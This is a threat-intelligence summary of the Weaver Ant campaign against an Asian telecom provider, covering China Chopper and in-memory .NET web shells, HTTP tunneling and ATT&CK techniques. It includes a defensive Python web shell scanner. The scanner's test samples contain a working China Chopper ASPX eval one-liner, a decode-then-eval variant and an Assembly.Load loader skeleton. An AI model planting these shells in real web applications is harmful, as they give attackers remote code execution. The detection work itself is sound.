EXECUTIVE SUMMARY
A cyber espionage campaign targeted a major telecommunications provider in Asia, orchestrated by a China-nexus threat actor tracked as Weaver Ant. The attack relied on web shells for persistent access, enabling data collection and lateral movement. The intrusion was first detected when a dormant, previously compromised account was re-enabled, which triggered an alert and an extensive forensic investigation. Security analysts discovered a variant of the China Chopper web shell that had sat on an internal server for several years, revealing a second, ongoing operation that had gone unnoticed. Hunting with YARA rules across the estate, the investigators identified numerous web shells deployed throughout the network, all part of a single larger espionage campaign. The attackers used web shell tunneling to move between network segments while bypassing the controls placed between them.
The analysis uncovered two primary web shells: an encrypted China Chopper variant and a custom-built INMemory web shell. The China Chopper variant was designed to get past web application firewalls (WAFs) by encrypting its payloads and shaping its requests to evade inspection. The INMemory web shell executed its payload entirely in memory: it decoded an embedded Base64-encoded Portable Executable (PE) and loaded it without writing anything to disk, defeating file-based detection. Together these tools let the attackers maintain persistent access, execute remote commands, and deploy additional payloads without raising alarms. A further stealth technique was recursive HTTP tunneling, in which each compromised web server acted as a proxy that forwarded the operator's commands to the next server in the chain. By mirroring network traffic, investigators captured the encrypted payloads in transit and decrypted them, exposing the full scope of the operation. The result was a multi-layered intrusion in which each compromised machine served as a stepping stone to another, demonstrating the adversary's sophistication and adaptability.
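The two web shell families described above share structural traits that a content hunt can key on, which is the kind of thing the YARA-based sweep in the investigation would have looked for. The following Python scanner is an added example written for this summary; it is not a tool or rule set from the Weaver Ant investigation, and it does not reproduce the actual cipher of the encrypted China Chopper variant (which is not documented here). The rules approximate: China Chopper's eval() of a request parameter, variants that decode or decrypt the parameter shortly before eval(), and an in-memory .NET loader that turns an embedded Base64 string into a PE and hands it to Assembly.Load. The four sample files, the "Loader.Entry" class name and the Base64 stand-in for a DLL are all constructed for illustration.

```python
"""Heuristic web shell scanner for ASP.NET content (added example, not from the report).

The regexes approximate the traits described in the summary: China Chopper's
eval() of a request parameter, decode-then-eval variants, and an in-memory .NET
loader (Base64 -> byte[] -> Assembly.Load -> reflective call). All sample files
below are constructed; no real payload or real rule from the investigation is included.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Classic China Chopper ASPX one-liner: eval(Request.Item["pw"], "unsafe").
CHOPPER_EVAL = re.compile(
    r"eval\s*\(\s*Request\s*(\.\s*(Item|Form|QueryString|Params))?\s*\[", re.IGNORECASE)
# Encoded/encrypted variant: the request body is decoded or decrypted shortly before eval().
CHOPPER_DECODE_THEN_EVAL = re.compile(
    r"(FromBase64String|Decrypt\w*|CreateDecryptor)\s*\([\s\S]{0,400}?\beval\s*\(", re.IGNORECASE)
# In-memory loader traits: Base64 -> byte[] -> Assembly.Load(...) -> reflection call.
INMEMORY_B64 = re.compile(r"Convert\s*\.\s*FromBase64String\s*\(", re.IGNORECASE)
INMEMORY_LOAD = re.compile(r"Assembly\s*\.\s*Load\s*\(", re.IGNORECASE)
INMEMORY_CALL = re.compile(r"\.\s*(Invoke|CreateInstance)\s*\(", re.IGNORECASE)
# A long run of Base64 text whose first four chars decode to an MZ header ("TVqQ" == b64(b"MZ\x90\x00")).
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
PE_B64_PREFIX = "TVqQ"


@dataclass
class Finding:
    path: str
    rules: List[str] = field(default_factory=list)


def scan_content(path: str, content: str) -> Finding:
    """Apply every rule to one file's text and return the names of the rules that fired."""
    f = Finding(path)
    if CHOPPER_EVAL.search(content):
        f.rules.append("china_chopper_eval_request")
    if CHOPPER_DECODE_THEN_EVAL.search(content):
        f.rules.append("china_chopper_decode_then_eval")
    if INMEMORY_B64.search(content) and INMEMORY_LOAD.search(content) and INMEMORY_CALL.search(content):
        f.rules.append("inmemory_dotnet_loader")
    m = LONG_B64.search(content)
    if m and m.group(0).startswith(PE_B64_PREFIX):
        f.rules.append("embedded_base64_pe")
    return f


def scan_directory(root: str, exts=(".aspx", ".ashx", ".asmx", ".asax")) -> List[Finding]:
    """Walk a web root (e.g. C:\\inetpub\\wwwroot) and return only the files with hits."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith(exts):
                p = os.path.join(dirpath, n)
                with open(p, "r", encoding="utf-8", errors="ignore") as fh:
                    f = scan_content(p, fh.read())
                if f.rules:
                    hits.append(f)
    return hits


# --- constructed sample files (not real artifacts from the investigation) ---
CONSTRUCTED_PE_B64 = PE_B64_PREFIX + "A" * 220  # stand-in for a Base64-encoded .NET DLL

SAMPLES: Dict[str, str] = {
    "benign.aspx": (
        '<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" '
        'Inherits="Portal._Default" %>\n'
        '<html><body><asp:Label ID="lblStatus" runat="server" /></body></html>\n'
    ),
    "chopper.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>\n',
    "chopper_enc.aspx": (
        '<%@ Page Language="Jscript"%><%\n'
        'var c = System.Convert.FromBase64String(Request.Form["data"]);\n'
        'var d = System.Text.Encoding.UTF8.GetString(xorDecrypt(c, "k3y"));\n'
        'eval(d, "unsafe");\n%>\n'
    ),
    "inmemory.aspx": (
        '<%@ Page Language="C#" %>\n<%@ Import Namespace="System.Reflection" %>\n'
        '<script runat="server">\n'
        'static string payload = "' + CONSTRUCTED_PE_B64 + '";\n'
        'void Page_Load(object s, EventArgs e) {\n'
        '    byte[] raw = Convert.FromBase64String(payload);\n'
        '    Assembly asm = Assembly.Load(raw);\n'
        '    object o = asm.CreateInstance("Loader.Entry");\n'
        '    o.GetType().GetMethod("Run").Invoke(o, new object[] { Context });\n'
        '}\n</script>\n'
    ),
}


def scan_samples() -> Dict[str, List[str]]:
    """Run the rules over the constructed samples; returns {filename: rules that fired}."""
    return {name: scan_content(name, text).rules for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, rules in scan_samples().items():
        print(f"{name:18} {'CLEAN' if not rules else ', '.join(rules)}")
```

The decode-then-eval rule is deliberately structural rather than keyed on a specific cipher, since an operator who changes the encryption routine leaves the shape (decode, decrypt, eval of the result) intact. Run scan_directory against a copy of the web root rather than the live one, and treat a hit as a lead for the full forensic workflow the summary describes, not as a verdict on its own.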
The discovery of this intrusion highlighted the evolving nature of cyber threats targeting critical infrastructure. The attackers implemented multiple layers of encryption, obfuscation, and stealth tactics to ensure prolonged access without detection. Their ability to manipulate legitimate web traffic and bypass security mechanisms demonstrated the necessity for organizations to adopt a multi-faceted security approach. Advanced forensic analysis techniques, such as network traffic decryption and automated payload analysis, proved essential in unravelling the attack's complexity. The campaign also revealed the adversary’s intent to maintain access to compromised networks over extended periods. As a result, defensive strategies must evolve to counter these adaptive threats, integrating continuous monitoring, endpoint security enhancements, and proactive threat intelligence to detect and disrupt similar operations before they cause significant damage.
THREAT PROFILE:
| Tactic | Technique ID | Technique |
|---|---|---|
| Persistence | T1505 | Server Software Component |
| Execution | T1059 | Command and Scripting Interpreter |
| Execution | T1203 | Exploitation for Client Execution |
| Defense Evasion | T1140 | Deobfuscate/Decode Files or Information |
| Defense Evasion | T1562 | Impair Defenses |
| Defense Evasion | T1027 | Obfuscated Files or Information |
| Credential Access | T1552 | Unsecured Credentials |
| Lateral Movement | T1570 | Lateral Tool Transfer |
| Lateral Movement | T1071 | Application Layer Protocol |
| Collection | T1005 | Data from Local System |
| Command and Control | T1573 | Encrypted Channel |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
REFERENCES:
The following reports contain further technical details: